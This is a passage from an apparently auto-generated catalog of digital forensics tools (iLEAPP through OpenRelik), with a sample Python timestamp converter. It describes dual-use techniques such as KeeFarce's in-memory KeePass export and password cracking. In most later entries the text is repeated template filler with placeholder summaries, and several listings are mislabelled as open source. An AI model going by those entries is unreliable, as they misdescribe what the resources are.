Operational value: Deleted-record recovery matters because clearing history removes rows but does not necessarily overwrite the database pages that held them.

Typical deployment pattern: Copy WebCacheV01.dat from an image or a volume shadow copy, since it is locked on a running system. A copy taken live is often in a dirty-shutdown state, and the parser, or a repair step such as esentutl, must cope with that on a working copy, never on the original. ESE timestamps are FILETIME values and must be converted to UTC before they are merged into a timeline.

Selection considerations: Verify output against a second ESE parser on a known sample, because deleted-record recovery is heuristic. Related source context: Awesome Forensics > Tools > Internet Artifacts.

Back to Name Jump

iLEAPP

  • Website: https://github.com/abrignoni/iLEAPP
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: iLEAPP parses iOS extractions into reports. The source summary describes it as: an iOS Logs, Events, And Plists Parser. It takes a full file system extraction or a backup, runs a library of artifact modules over it and writes HTML and TSV reports with a timeline.

Operational value: It covers the long tail of iOS artifacts (plists, SQLite databases, logs) with community-maintained modules, so a team can produce consistent reports without reverse engineering each database itself.

Typical deployment pattern: Run it on the workstation against the extraction, not the device; keep the extraction hashed and read-only, and feed the TSV output into your timeline tooling.

Selection considerations: Modules lag iOS releases, so check that the artifacts you rely on are supported for the target version, and re-run with a newer release when modules are added. Related source context: Awesome Forensics > Tools > Mobile Forensics.

Back to Name Jump

Incidents

  • Website: https://github.com/veeral-patel/incidents
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Incidents is an investigation tracker rather than an analysis tool. The source summary describes it as: web application for organizing non-trivial security investigations, built on the idea that incidents are trees of tickets, where some tickets are leads.

Operational value: Modelling an investigation as a tree of tickets keeps leads, their outcomes and who is working each one visible, which is exactly what gets lost when a large incident is tracked in chat.

Typical deployment pattern: Host it on infrastructure separate from the environment under investigation, restrict access to the response team, and keep an export of the ticket tree for the final report.

Selection considerations: Check repository activity and compare it with the case management features of platforms your team already runs before adding another system. Related source context: Awesome Forensics > Tools > Management.

Back to Name Jump

InfoStealers

  • Website: https://infostealers.info/en/info
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome OSINT

What it does: InfoStealers is a hosted lookup service, not software you deploy. The source summary describes it as: indexes darknet-exposed infostealer logs and makes them searchable and actionable for security teams, investigators, researchers, and digital forensics professionals.

Operational value: Learning that a user's credentials appear in a stealer log explains otherwise puzzling account access and points at the compromised endpoint that needs to be collected.

Typical deployment pattern: Query it during triage of credential-based intrusions; every query discloses the identifiers you are investigating to the provider, so agree in advance on what may be submitted and on which legal basis.

Selection considerations: The open-source criteria do not apply to a hosted service; evaluate the provider's data sourcing, retention and access controls instead. Related source context: Awesome OSINT > Email Search / Email Check.

Back to Name Jump

IntelBase

  • Website: https://intelbase.is/
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome OSINT

What it does: IntelBase is a hosted email intelligence service. The source summary describes it as: forensics platform focused on reverse email lookup and email data enrichment.

Operational value: Enrichment links an email address seen in an incident to accounts, breaches or other identifiers, which helps attribute phishing or account-takeover activity.

Typical deployment pattern: Use it as an OSINT step during triage; as with any external lookup, the addresses you submit are disclosed to the provider, so keep queries to what the case justifies.

Selection considerations: Evaluate it on data provenance, retention and terms of use rather than on the open-source criteria. Related source context: Awesome OSINT > Email Search / Email Check.

Back to Name Jump

iOS Frequent Locations Dumper

  • Website: https://github.com/mac4n6/iOS-Frequent-Locations-Dumper
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: iOS Frequent Locations Dumper extracts the places iOS learns the user frequents from the routined daemon's data. The source summary describes it as: dump the contents of the StateModel#.archive files located in /private/var/mobile/Library/Caches/com.apple.routined/.

Operational value: These records place the device at locations over time independently of any app, so they corroborate or contradict other timeline sources.

Typical deployment pattern: Run it against files taken from a full file system extraction; the path is outside what a standard backup contains. Timestamps are Cocoa absolute time (seconds since 2001-01-01 UTC) and need conversion before they are compared with other artifacts.

Selection considerations: The archive format belongs to older iOS versions; check the README for the releases it covers and look for the equivalent SQLite stores under the same routined path in newer ones. Related source context: Awesome Forensics > Tools > Mobile Forensics.

Back to Name Jump

IPED - Indexador e Processador de Evidências Digitais

  • Website: https://github.com/sepinf-inc/IPED
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: IPED is a Java-based evidence processing and review platform. The source summary describes it as: Brazilian Federal Police tool for forensic investigations. It processes disk images, mobile extractions and loose files, indexes their content for search, and provides a reviewer interface.

Operational value: It is built for high case volume: full-text indexing plus bookmark-based review lets several examiners work the same case and produces reports for non-technical readers.

Typical deployment pattern: Install it on a processing workstation with substantial disk for the index, process the evidence once, then review from the generated case folder.

Selection considerations: An active project with an institutional maintainer; the tradeoff is the learning curve of a large platform. Related source context: Awesome Forensics > Tools > Frameworks.

Back to Name Jump

IvySyn

  • Website: https://gitlab.com/brown-ssl/ivysyn
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Fuzzing

What it does: IvySyn is a vulnerability discovery tool, not a forensics tool; it is included from the fuzzing list. The source summary describes it as: a fully-automated framework for discovering memory error vulnerabilities in Deep Learning (DL) frameworks. It fuzzes the native kernels behind frameworks such as TensorFlow and PyTorch to find crashes reachable from the Python API.

Operational value: Relevant to teams that ship or depend on ML frameworks, where a memory error in a kernel is reachable by anyone who can supply a model or tensor input.

Typical deployment pattern: Research-grade tooling: expect to build the target framework with instrumentation and to triage crashes by hand.

Selection considerations: A research artifact accompanying a paper, so treat maintenance as best-effort and compare it with the frameworks' own fuzzing efforts. Related source context: Awesome Fuzzing > Tools > API.

Back to Name Jump

Letter J

This letter section contains 1 tool.

John the Ripper

  • Website: https://www.openwall.com/john/
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: John the Ripper is a password cracker. The source summary describes it as: password cracker. The jumbo build supports hundreds of hash and container formats and ships *2john helper scripts (zip2john, pdf2john, keepass2john and others) that turn an encrypted file into a crackable hash.

Operational value: In DFIR it recovers passwords for encrypted archives, documents and password databases found on evidence, and shows whether credentials taken from a compromised host were weak enough for the attacker to have cracked them.

Typical deployment pattern: Run it on a dedicated cracking machine with wordlists and rules tuned from case context (names, dates, other recovered passwords); never against systems you are not authorised to test.

Selection considerations: Mature and actively maintained, complementary to hashcat; choose between them by format support and available hardware. Related source context: Awesome Forensics > Tools > Decryption.

Back to Name Jump

Letter K

This letter section contains 3 tools.

KeeFarce

  • Website: https://github.com/denandz/KeeFarce
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: KeeFarce is an offensive tool that the source list files under memory forensics. The source summary describes it as: extract KeePass passwords from memory. It injects into a running KeePass 2.x process on Windows and uses the application's own code to export the unlocked database in clear text.

Operational value: For defenders the value is the technique itself: an unlocked password manager is fully exposed to code running as the same user, which sets expectations for what an attacker with a foothold obtained.

Typical deployment pattern: Use it only in authorised assessments; in investigations, look for the traces of such a run (injection into the KeePass process, an export file written to disk) rather than running it on evidence.

Selection considerations: A proof of concept tied to specific KeePass versions; check that it still matches the target before relying on it in an assessment. Related source context: Awesome Forensics > Tools > Memory Forensics.

Back to Name Jump

Kroll Artifact Parser and Extractor (KAPE)

  • Website: https://learn.duffandphelps.com/kape
  • Model: Free download (proprietary; licensing terms set by Kroll)
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome CTF

What it does: KAPE is a triage collection and processing tool for Windows. The source summary describes it as: triage program. Targets (.tkape files) declare which files to copy and modules (.mkape files) declare which processors to run on them, so one command collects registry hives, event logs, prefetch and other artifacts and parses them in a single pass.

Operational value: A KAPE collection takes minutes instead of the hours a full image needs, which is what makes early triage across many hosts feasible.

Typical deployment pattern: Run it from external media or pushed through your EDR or remote execution tooling, collect to a destination that is hashed and preserved, and keep full imaging for hosts where triage shows a need. It copies from live systems and can pull from volume shadow copies.

Selection considerations: Free but closed source, so the open-source criteria do not apply; evaluate on the community-maintained target and module sets and on the licensing terms for your use. Related source context: Create > Forensics.

Back to Name Jump

kube-forensics

  • Website: https://github.com/keikoproj/kube-forensics
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Cybersecurity Blue Team

What it does: kube-forensics captures a running pod for offline analysis. The source summary describes it as: allows a cluster administrator to dump the current state of a running pod and all its containers so that security professionals can perform off-line forensic analysis.

Operational value: Containers are ephemeral and are usually deleted on remediation, so a capture taken before anyone scales the deployment down is often the only record of what actually ran.

Typical deployment pattern: Install it in the cluster ahead of time, because deploying a controller during an incident is slow and noisy; make sure the storage it writes to is outside the cluster, access-controlled, and hashed on write.

Selection considerations: It runs with cluster-level privileges and its output depends on the container runtime, so test it against your actual runtime and Kubernetes version before you need it. Related source context: Awesome Cybersecurity Blue Team > Cloud platform security > Kubernetes.

Back to Name Jump

Letter L

This letter section contains 3 tools.

libewf

  • Website: https://github.com/libyal/libewf
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: libewf is the open implementation of the Expert Witness format. The source summary describes it as: a library and some tools to access the Expert Witness Compression Format (EWF, E01). The tools include ewfacquire (imaging), ewfinfo (metadata and stored hashes), ewfverify (re-hash and compare), ewfexport (convert to raw) and ewfmount (expose the image as a raw file); Python bindings (pyewf) are part of the project.

Operational value: It is what lets open tooling such as The Sleuth Kit, Autopsy and plaso read E01 images produced by FTK Imager, Guymager or commercial suites, so E01 stays an interoperable format rather than a vendor lock-in.

Typical deployment pattern: Install it from your distribution or build from source; make ewfverify the standard step for confirming an image still matches its acquisition hash after transfer or storage.

Selection considerations: Part of the libyal family with a single principal maintainer and a steady release cadence; be aware of the stable versus experimental release lines the project publishes. Related source context: Awesome Forensics > Tools > Disk image handling.

Back to Name Jump

Linux Expl0rer

  • Website: https://github.com/intezer/linux-explorer
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Linux Expl0rer is a live-response toolbox. The source summary describes it as: easy-to-use live forensics toolbox for Linux endpoints written in Python & Flask. It runs on the endpoint and exposes process, network, file and user information through a web interface.

Operational value: Useful when imaging is not an option and the responder needs a fast view of what is running and listening on a suspect Linux host.

Typical deployment pattern: Live forensics changes the system, so record what was installed and when. Bind the Flask interface to localhost and reach it over an SSH tunnel; an unauthenticated web console on a possibly compromised host hands the attacker the same view.

Selection considerations: Check repository activity and dependency age before use; an abandoned Flask application carries its own vulnerabilities. Related source context: Awesome Forensics > Tools > Live Forensics.

Back to Name Jump

LOKI

  • Website: https://github.com/ConsensusFuzz/LOKI
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Fuzzing

What it does: LOKI here is a fuzzing framework, not a forensics tool. The source summary describes it as: a blockchain consensus protocol fuzzing framework that detects the consensus memory related and logic bugs. Do not confuse it with Loki, the IOC scanner by Florian Roth (Neo23x0/Loki), which is the DFIR tool readers searching for this name usually want.

Operational value: Relevant to teams auditing or operating blockchain nodes, where consensus bugs mean chain forks or denial of service across the network.

Typical deployment pattern: Research tooling that has to be adapted to the specific consensus implementation under test.

Selection considerations: Evaluate it as a research artifact: check for activity and for coverage of the protocol you run. Related source context: Awesome Fuzzing > Tools > Blockchain.

Back to Name Jump

Letter M

This letter section contains 13 tools.

MacLocationsScraper

  • Website: https://github.com/mac4n6/Mac-Locations-Scraper
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: MacLocationsScraper extracts location history from Apple devices. The source summary describes it as: dump the contents of the location database files on iOS and macOS.

Operational value: Location records with timestamps anchor a device, and usually its user, to places and times that other artifacts only imply.

Typical deployment pattern: Run it against database files copied from a full file system extraction or a macOS image; the stores are SQLite, and the timestamps are Cocoa absolute time (seconds since 2001-01-01 UTC) that must be converted before they are merged with Unix or Windows timestamps.

Selection considerations: A small script from the mac4n6 project; verify the table names against the OS version you are examining, since Apple changes them. Related source context: Awesome Forensics > Tools > OS X Forensics.
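The timestamp conversions called out for IE10Analyzer (ESE stores FILETIME), iLEAPP, iOS Frequent Locations Dumper and MacLocationsScraper (Apple artifacts store Cocoa absolute time), as an added example that is not code from any of those tools: three artifact types with three epochs are normalised into one sorted UTC timeline. The SQLite schema, every row and the log line are constructed for this illustration, not Apple's or Microsoft's real table layouts, and the millisecond/nanosecond heuristic in from_cocoa is an assumption rather than a documented rule.

```python
"""One UTC timeline from artifacts that count time from different epochs.

Added example; not code from IE10Analyzer, iLEAPP, iOS Frequent Locations
Dumper or MacLocationsScraper. Assumed conventions: ESE tables such as
WebCacheV01.dat store Windows FILETIME (100 ns ticks since 1601-01-01), Apple
location/routined artifacts store Cocoa absolute time (seconds since
2001-01-01, in some stores scaled to ms or ns), and Unix logs store seconds
since 1970-01-01. Every sample row below is constructed, not from a device.
"""
import sqlite3
from datetime import datetime, timedelta, timezone

WINDOWS_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
COCOA_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)
UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def from_filetime(ticks):
    """FILETIME: 100-nanosecond intervals since 1601-01-01 UTC."""
    return WINDOWS_EPOCH + timedelta(microseconds=ticks // 10)


def from_cocoa(value):
    """Cocoa/Mac absolute time. Heuristic (an assumption, not an Apple rule):
    values far beyond any plausible second count are treated as ns or ms."""
    if value > 1e15:
        value /= 1e9
    elif value > 1e11:
        value /= 1e3
    return COCOA_EPOCH + timedelta(seconds=value)


def from_unix(seconds):
    """Classic Unix epoch seconds."""
    return UNIX_EPOCH + timedelta(seconds=seconds)


def iso(moment):
    return moment.strftime("%Y-%m-%dT%H:%M:%SZ")


def constructed_routined_db():
    """In-memory stand-in for a location cache (constructed schema; Apple's
    real table and column names differ)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE visits (entry_cocoa REAL, exit_cocoa REAL, lat REAL, lon REAL)")
    db.execute("INSERT INTO visits VALUES (731325000.0, 731327400.0, 48.8566, 2.3522)")
    return db


def build_timeline():
    """Normalise three artifact types into one list of UTC events, oldest first."""
    events = []
    db = constructed_routined_db()
    for entry, exit_, lat, lon in db.execute("SELECT * FROM visits"):
        events.append((from_cocoa(entry), "routined visit (Cocoa)", f"arrived near {lat},{lon}"))
        events.append((from_cocoa(exit_), "routined visit (Cocoa)", f"left near {lat},{lon}"))
    # Constructed WebCache-style row: an AccessedTime column as FILETIME.
    events.append((from_filetime(133541073300000000), "WebCacheV01.dat (FILETIME)",
                   "GET http://example.invalid/login"))
    # Constructed syslog-style record: Unix seconds.
    events.append((from_unix(1709634930), "auth.log (Unix)", "sshd: session opened for bob"))
    events.sort(key=lambda event: event[0])
    return [{"time": iso(when), "source": source, "event": what} for when, source, what in events]


if __name__ == "__main__":
    for row in build_timeline():
        print(row["time"], row["source"], row["event"], sep="  ")
```

Keeping every converter explicit about its epoch, and asserting known reference points (FILETIME 116444736000000000 is the Unix epoch), is what prevents the classic 31-year or 369-year offset from silently reordering a timeline.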

Back to Name Jump

macMRUParser

  • Website: https://github.com/mac4n6/macMRU-Parser
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: macMRUParser reads the macOS "most recently used" lists. The source summary describes it as: Python script to parse the Most Recently Used (MRU) plist files on macOS into a more human friendly format. MRU data lives in per-application plists and in the shared file lists (.sfl/.sfl2) under Library/Application Support/com.apple.sharedfilelist, much of it as serialized bookmark data that has to be decoded to yield paths.

Operational value: MRU lists show which documents, volumes and servers a user opened, including items that have since been deleted or unmounted.

Typical deployment pattern: Run it on files copied from the user's Library directory in an image; parse every application's list, not only Finder's, and normalise the Cocoa timestamps into the case timeline.

Selection considerations: Apple changes the shared file list format across releases (sfl to sfl2 and later variants), so confirm the script handles the version present in your evidence. Related source context: Awesome Forensics > Tools > OS X Forensics.

Back to Name Jump

Magnet AXIOM

  • Website: https://www.magnetforensics.com/downloadaxiom
  • Model: Commercial (proprietary)
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome CTF

What it does: Magnet AXIOM is a commercial forensic suite. The source summary describes it as: artifact-centric DFIR tool. It processes computer, mobile and cloud evidence and presents results by artifact type rather than by file system location.

Operational value: Artifact-centric review speeds up casework for examiners who need answers (messages, browsing, accounts) more than raw structures.

Typical deployment pattern: Licensed per examiner workstation; findings that matter legally are typically cross-checked with a second tool, which the open tools in this list can provide.

Selection considerations: Proprietary and licensed, so maintainer activity is replaced by vendor support, licence cost and artifact coverage for the platforms you actually see. Related source context: Create > Forensics.

Back to Name Jump

MagnetForensics CTF Challenge

  • Website: https://www.magnetforensics.com/blog/magnet-weekly-ctf-challenge/
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: MagnetForensics CTF Challenge is a training resource, not a tool: a series of weekly forensic challenges published by Magnet Forensics, each built on a released evidence image with questions to answer. The source list gives no further description.

Operational value: Practising on published images lets analysts exercise tooling and build a repeatable method before a real case.

Typical deployment pattern: Use the challenge images as a benchmark corpus when evaluating a new tool or training a new team member.

Selection considerations: The series ran as a blog event; confirm the images and answer write-ups are still available. Related source context: Awesome Forensics > Learn Forensics > CTFs and Challenges.

Back to Name Jump

Maltego

  • Website: http://www.maltego.com/
  • Model: Proprietary (free Community Edition available)
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Penetration Testing

What it does: Maltego is a link-analysis tool for OSINT. The source summary describes it as: proprietary software for open sources intelligence and forensics. It builds graphs of entities (domains, IP addresses, people, email addresses) and expands them with transforms that query external data sources.

Operational value: In an investigation it maps the infrastructure and identities around an indicator quickly and shows the relationships visually.

Typical deployment pattern: Transforms send your indicators to third-party data providers, so decide which transform sets are acceptable for a sensitive case and keep the graph file with the case records.

Selection considerations: Proprietary, with a free Community Edition that limits result sizes; evaluate on licence terms and available transform sources, not on open-source criteria. Related source context: Awesome Penetration Testing > Open Sources Intelligence (OSINT).

Back to Name Jump

MalwareTech Labs

  • Website: https://malwaretech.com/labs/
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: MalwareTech Labs is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Learn Forensics > CTFs and Challenges.

Back to Name Jump

MEAT

  • Website: https://github.com/jfarley248/MEAT
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: MEAT is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Perform different kinds of acquisitions on iOS devices.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Mobile Forensics.

Back to Name Jump

MemLabs

  • Website: https://github.com/stuxnet999/MemLabs
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: MemLabs is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Learn Forensics > CTFs and Challenges.

Back to Name Jump

MemProcFS

  • Website: https://github.com/ufrisk/MemProcFS
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: MemProcFS is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: An easy and convenient way of accessing physical memory as files in a virtual file system.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Memory Forensics.

Back to Name Jump

MFT-Parsers

  • Website: http://az4n6.blogspot.com/2015/09/whos-your-master-mft-parsers-reviewed.html
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: MFT-Parsers is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Comparison of MFT parsers.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts > NTFS/MFT Processing.

Back to Name Jump

MFTEcmd

  • Website: https://binaryforay.blogspot.com/2018/06/introducing-mftecmd.html
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: MFTEcmd is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: MFT parser by Eric Zimmerman.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts > NTFS/MFT Processing.

Back to Name Jump

MFTMactime

  • Website: https://github.com/kero99/mftmactime
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: MFTMactime is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: MFT and USN parser that allows direct extraction in filesystem timeline format (mactime), dumps all resident files in the MFT in their original folder structure, and runs YARA rules over them all.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts > NTFS/MFT Processing.

Back to Name Jump

mig

  • Website: https://github.com/mozilla/mig
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: mig is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Distributed, real-time digital forensics at the speed of the cloud.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Live Forensics.

Back to Name Jump

Letter N

This letter section contains 5 tools.

Netresec

  • Website: https://www.netresec.com/index.ashx?page=Blog
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Netresec is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Resources > Blogs.

Back to Name Jump

NTFS journal parser

  • Website: http://strozfriedberg.github.io/ntfs-linker/
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: NTFS journal parser is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts > NTFS/MFT Processing.

Back to Name Jump

NTFS USN Journal parser

  • Website: https://github.com/PoorBillionaire/USN-Journal-Parser
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: NTFS USN Journal parser is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts > NTFS/MFT Processing.

Back to Name Jump

NTFSTool

  • Website: https://github.com/thewhiteninja/ntfstool
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: NTFSTool is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Complete NTFS forensics tool.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts > NTFS/MFT Processing.

Back to Name Jump

NW3C Challenges

  • Website: https://nw3.ctfd.io
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: NW3C Challenges is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Learn Forensics > CTFs and Challenges.

Back to Name Jump

Letter O

This letter section contains 5 tools.

OfflineRegistryView

  • Website: https://www.nirsoft.net/utils/offline_registry_view.html
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome CTF

What it does: OfflineRegistryView is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Simple tool for Windows that allows you to read offline Registry files from an external drive and view the desired Registry key in .reg file format.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

Back to Name Jump

OpenBackupExtractor

  • Website: https://github.com/vgmoose/OpenBackupExtractor
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: OpenBackupExtractor is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: An app for extracting data from iPhone and iPad backups.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Mobile Forensics.

Back to Name Jump

OpenRelik

  • Website: https://openrelik.org/
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

